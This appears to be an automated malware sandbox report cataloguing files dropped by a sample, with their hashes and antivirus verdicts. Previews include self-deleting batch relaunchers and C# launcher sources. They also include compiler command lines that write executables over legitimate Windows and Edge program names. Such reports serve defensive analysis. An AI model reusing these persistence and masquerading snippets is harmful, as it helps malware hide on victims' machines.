SHA-512:	E4A6FA109DE5520CD3BF0A3E4F8E73238DF35D1827E679B49D986CA04D1435A964A667703B14168C057C59D3BBA5F43A6624206B52B3F066373461D47A390236
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\18c7CaCol3

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:zxw223Orcss:z222+0
MD5:	12640B5390768CF03D531535BCC9B77A
SHA1:	BF5BF3BDF026B1894FD2F0D847D656842F976300
SHA-256:	E5A3D56DB2FC58D683B8E803EB070D01B608D2DBAC68C50908C00DAFC52E8852
SHA-512:	A625F6900214B9A02EF5A6AA3F7F2738DB6F421ADE4A46D8EDDD7F201C89EAE05599DBCA6C6503C25CF8D638DCB6C64F0BB5B82F58AD09448B7EEE89E8DBF590
Malicious:	false
Preview:	XK9T0Ob7UKketunFd4OPN9vEI

C:\Users\user\AppData\Local\Temp\7z2CYqkT7L.bat

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221
Entropy (8bit):	5.161339944447072
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1cSR5L/ZKOZG1cNwi23fw:HTg9uYDE2ZI
MD5:	E32F9B53E579FF06C1CC401159460018
SHA1:	2EF40AC17CC526EFD5D5D5340937542B1F6F73DF
SHA-256:	55EC0FC06E851888C74F0F2E522BBB2C90F84F4E11220BE71C46C81FE14E7081
SHA-512:	62B0FDF299AB8C19C2551253E0D587F2FAE4AEEA1C319DE13CEB0B47D9790898436EC43AA66B93A7777959B0129EB475BC9F4F6C2B80C642F2CD08E2A5ACD547
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\VIyu4dC9CU.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\7z2CYqkT7L.bat"

C:\Users\user\AppData\Local\Temp\8xzCCjkggZ

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.103465189601646
Encrypted:	false
SSDEEP:	3:+efJFVTX:++TX
MD5:	67F6B0A831C3211FC370A244DBD38C38
SHA1:	F0FE2E1FCA5186928111C0A123A6720366B3C55D
SHA-256:	DC45D6B2F7B7D5F3B289E46096711CC60777C2E1867B511E2A69DD844909D372
SHA-512:	8E56FD19C70506E1360C714F63E27C055E20B87FB15C626557DDF93CB4E9B2E9256E77BAB08C9713C8D355BAD4E19BB69CB78B3027D8942277B568CECDE14219
Malicious:	false
Preview:	PBCBkTzgbEvPABfc23bf7HFPr

C:\Users\user\AppData\Local\Temp\CS5lFm0nOf.bat

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	154
Entropy (8bit):	5.095379068618015
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7VD70EovBktKcKZG10nacwRE2J5xAIXQJ0VeXkhn:hCRLuVFOOr+DE7VGvKOZG1cNwi23fX7Z
MD5:	6C82B296E21ECA4488F0A20E7A63A1C8
SHA1:	FAED870104C7A8F49CA845242F2512774AC7FB4F
SHA-256:	47647219A76C116812B81E690189C9DA101B861FCEA0AF343A41ADC67BD8B067
SHA-512:	5EDC86DB66441E8310957C0D798095420F635423DBB83AC6084E19C67945B288D805454F6A69F594AF912729C62A8B2646BD62DBB59759818C7D7C6B4A8D3F3C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\ctfmon.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\CS5lFm0nOf.bat"

C:\Users\user\AppData\Local\Temp\D5NfXEMzXI

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:eLQNk3Iv:e0h
MD5:	4BF40B3272282CA0814D1A9E5D57A007
SHA1:	4A2AB02ABA5ED7929DC6B2AEDC1040F47855B7DC
SHA-256:	F4E932702616A48E94A83075230D7FAFE604CB0333B27650ABA30A3033DC94E6
SHA-512:	8F5997122AD10C12B5E9980A59DCF9F3F781D1B6B09BA6DCC14C1FBD87C38BBDBDD2B81E264D638E8AB488CB49DCB4BD070CC93139A0833FCC46D2C44CA70763
Malicious:	false
Preview:	ddyZnuu5EiHqCkK1b0Ak2BmKE

C:\Users\user\AppData\Local\Temp\DbyRe8E9n6

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:UU795DcgXPk:UU55DXc
MD5:	4C6247C7944753B26C9B7CC910206267
SHA1:	B5C100186CBFC3CA6E8AAA226E4A1D1D76450E0B
SHA-256:	3E5623C65C22CC49AC3CF5A09D28A4329D48B2EFDEC9421F02C91E9AFD543A91
SHA-512:	FF8C448BC0813CAE38AF8C349F42642DCAFA360EB04339674C147ECED7EF21D05F89EF80DAC31A8C415075043AC23C8CDE80459E25FB311474C17F7055930C39
Malicious:	false
Preview:	ZeleSlqXNxRXTCu6f9sBrEGjA

C:\Users\user\AppData\Local\Temp\FAszyGTxO8

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:GNG/1BIeh+n:GNr5n
MD5:	A6DC12D2405C32D469FA3D531F664746
SHA1:	9CC3C08BCADA784E6EF8E822AF38C246356712C2
SHA-256:	7CE4B4A5D7F8A6E39CCAF11F4B692B9CFC305729A20018BF2617A247ADD7D05E
SHA-512:	803D8B131D7E15D404C5D46FFCB4169C56EBF86EECCEACD515BFB6E00C9DEB5371CC1BEFA7B8036A35D74D53CBEB51DA9BDE39601215287F8C89FCC6D1465CAC
Malicious:	false
Preview:	PzRnmlZpscEf5OcGZlmdMDz4E

C:\Users\user\AppData\Local\Temp\RES4065.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Sun Jan 12 01:09:37 2025, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1932
Entropy (8bit):	4.627226588314652
Encrypted:	false
SSDEEP:	48:UvaLzjaZ91KOZm6lmuulB+hnqXSfbNtmh5N:Vnj41KOc62TkZzNty5N
MD5:	2891C583ABCADAE997BA216BF2848A57
SHA1:	FE0D58D8E75B4FFBF80FCA0565DDCDCD11A2596F
SHA-256:	5A4870884F83D9F87BE7310BFAA4DA66E46144E53071A39F160CCC4AADE8E3A2
SHA-512:	E94141E807E3D27EA9EF1BAD5EC52C7650302BD847C6B43D8127A9FAFF47586631CD35D936BD12E61ADE991E2637492BA618A499CC530EED677C36BF7950C157
Malicious:	false
Preview:	L...Q..g.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC6CCC923AD8024E05BABB42F84D362A8A.TMP....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES4065.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.

C:\Users\user\AppData\Local\Temp\RES42D6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sun Jan 12 01:09:38 2025, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1956
Entropy (8bit):	4.57541080367815
Encrypted:	false
SSDEEP:	24:HZ9O9GXO8U2ZHlwKOZmN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:I72ZmKOZmyluOulajfqXSfbNtmh1Z
MD5:	3B470420CBB53C5EF00E1F33C499CA7F
SHA1:	2C15B9ADEDA8C7779CD921886D47983AE13BC545
SHA-256:	BFB8144C5AE4FED568A4364B4D4DA04C515B6B9162BB9EBDC9EB626D87C5E110
SHA-512:	10D979BF55A929C6699B055E6FB873CEEF515E7C71B7BE62835315BFA6C287AEB1ED77132FE68AEF4B659FCB78798C53A379C3544C64E7BF1A6684DC2328E69A
Malicious:	false
Preview:	L...R..g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...\|...............@..@........<....c:\Windows\System32\CSCF1A5C7715E64605B8685523D04CDF88.TMP..................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RES42D6.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	234
Entropy (8bit):	5.151492848452101
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5WHGget/bSKOZG1cNwi23fZEnG:HTg9uYDEfW1et/HZxsG
MD5:	983E05A672A49CDD6A75AA4C963F2237
SHA1:	6B937BEB51D994743946057BA3BEA40B36F14B05
SHA-256:	2317769849363C8FBE32DBB2680C041A02386EF69B7520635605A7307499B1CC
SHA-512:	F88812807B39EC3BB70108494F692AED680C13803FAA396B2E68EB6519254458541613FF8DE3C8EA1C71593234B26AB5E0E1DB3B856FF12CBBC33951A18E17B5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\reference assemblies\sppsvc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\dxSYZSKoEG.bat"

C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.0.cs

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	401
Entropy (8bit):	4.914724280096031
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LW1et/RiFkD:JNVQIbSfhV7TiFkMSfhWLW1etAFkD
MD5:	8A92F3B4B37313709E6D080B3948D9D4
SHA1:	D1045B3BBB3FEB3D1DD93A8DD00F9C898F75C778
SHA-256:	91B7E02E5B7389D90E03C33838969A73DE45AC2981FE143632CD0A0CB2F9E021
SHA-512:	9A56C0E53EE74CBE42C4C07A24DC72BF75375662F015DE2C8A719039C5A73A452FDD89C56025E700962D67AAD1EE7BAC6E245FF0A1D5DD1335F1021A6EC88D63
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\reference assemblies\sppsvc.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.cmdline

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	254
Entropy (8bit):	5.071356614875361
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23flBS5lzBSPn:Hu7L//TRq79cQlZO5qPn
MD5:	6D2E33DFCF42DC5AADC93F8860FBC395
SHA1:	4220BF64F7C5915165F101551E70E21E7E80B523
SHA-256:	05249847C96D18EAEA96E315094B9773C2D063D593BD5F48335BEDCC86C9C338
SHA-512:	E280BB83AA1355D8064099AED5D4DB9100CF67607C013BC51A779181673C9FF47D855D194A4B3516DB127A82ABFA997873B3A9EBFCD4A9E24D0546996E0A1CF8
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.0.cs"

C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.out

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
Category:	modified
Size (bytes):	758
Entropy (8bit):	5.252373939948727
Encrypted:	false
SSDEEP:	12:Ka/I/u7L//TRq79cQlZO5qPuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KwI/un/Vq79tDWKuKax5DqBVKVrdFAMb
MD5:	07EB58C3B76A899D8E0557B4C2350B84
SHA1:	BEC056CE30D55B76753D9A1E604EB63B96FC2931
SHA-256:	8308C9B313C42638D3B34C973C869C9F9B89FFCF294F877D75DD15C48C85330D
SHA-512:	3168FD214B2349F8C4836D67869F680EA614175552F29663F8D3E8ACBF9443C8921E6BEA472F893F118137A7FBEAC754F1CC14A4B2B66CC208BF554FF2C66BBE
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\gsjdpjdw\gsjdpjdw.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.0.cs

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	416
Entropy (8bit):	4.926144154280162
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LW1et/RiFkD:JNVQIbSfhWLzIiFkMSfhWLW1etAFkD
MD5:	B03D0381B6A2D4581A20F93EC0606201
SHA1:	115534BB10A940119C00CE9E1CC3B5A3AFD19E8D
SHA-256:	CB34391B99080E63573B4896D52842A07D64D50CC681C1A3EF5F6A179D996A02
SHA-512:	29F6C1F8E8CA04BF93D5A57ED2E974CF00552082B40CA2116CA2F0C6B39B0590A7A06544B23D62548C1E643D035D9A2708F0B400C708E10AB3D7392CA80B8DCF
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\reference assemblies\sppsvc.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.cmdline

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	269
Entropy (8bit):	5.0850194982192685
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fDYQsYEA:Hu7L//TRRzscQlZbYJYP
MD5:	A271C085939D763F1A028E3E0A7A04A0
SHA1:	0111A4342100E8D9F139FF6541A125148907419C
SHA-256:	65C6E5FC0BA2676A3616DDC47085FBEA78A71D6951D72D6466A6600A39D02C08
SHA-512:	43FABC37F463BB3D352344F93F160A056153D22DD3E088B462F5F725012BA319F5706BB33B2AFE2213C700F8DFC60A0095404BA498C130A3B37E45185D6D6347
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.0.cs"

C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.out

Download File

Process:	C:\Users\user\Desktop\VIyu4dC9CU.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (352), with CRLF, CR line terminators
Category:	modified
Size (bytes):	773
Entropy (8bit):	5.2317705263571455
Encrypted:	false
SSDEEP:	24:KwI/un/VRzstDbEhKax5DqBVKVrdFAMBJTH:xN/VRzEbEhK2DcVKdBJj
MD5:	F41C6CD171F697C40B54303764719BB2
SHA1:	AC31048CC974CEC6EAC786F809E7F9AAC2B41069
SHA-256:	9D17DBA7B0EDB41776E104CA7CCA44D760B8CF04A9714D6ADAA77AEEF6F5CC48
SHA-512:	F2827DF90FC9AA920239C5AD34D8E3AD91E351B0809167D181CDB50FB3E45ACC687BFE4F3E9AB9602F8F7ABA4992F7C58D7E2BA7AEE7AAB06F8E3B3DD866DE06
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\xml2dols\xml2dols.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	234
Entropy (8bit):	5.14295328545964
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5WHGget/bSKOZG1cNwi23fPH:HTg9uYDEfW1et/HZ3H
MD5:	31D6BCF6B04698D8E6F09D0405574A2C
SHA1:	87FC8FC64826B092D8B359E9E9E0AFEBF6CBB884
SHA-256:	869AD2D17B58448C65B1E3B90DF9F4B46C030FFD970D45543C0EEAAF2F833E63
SHA-512:	CEFB7ABA24D6A5E96A84A16ED1BE52BD18E1E49C19CC6648E3417CED11B4496DC8D2562CD36860CFAAFB34ABCE13684F048EACB6FB7EF84E2CBA37E997270697
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\reference assemblies\sppsvc.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\yFJPVaLwHB.bat"

C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat

Download File

Process:	C:\Recovery\ctfmon.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	202
Entropy (8bit):	5.087504903916038
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE7VGvKOZG1cNwi23f+vCLqn:HTg9uYDE7oeZdq
MD5:	BDC79D71769B0D7C08641CB8FB78F51D
SHA1:	F3F923EBD9DB2DF7C809FF30ADC0F4D8D5AA31DB
SHA-256:	17FD0BF818D92B079DA3A97CE64EF93853C5A4BEC20CF116A525CEBBEF9F579F
SHA-512:	D0D5EB69A284A9A94712CACBDD5264D12B7182446D7D457364F79178FF6D3E29C35CBBCDACE4BAE17CF26653DE125D361B73686F9667A13AE5F476135AD0C850
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\ctfmon.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zsJdcY9yPm.bat"

C:\Users\user\Desktop\AOCihfsW.log

Download File

Process:	C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\BeMjthTj.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\CdEzwRtl.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DhgBcIwD.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\DtUIufbH.log

Download File

Process:	C:\Program Files (x86)\Reference Assemblies\sppsvc.exe
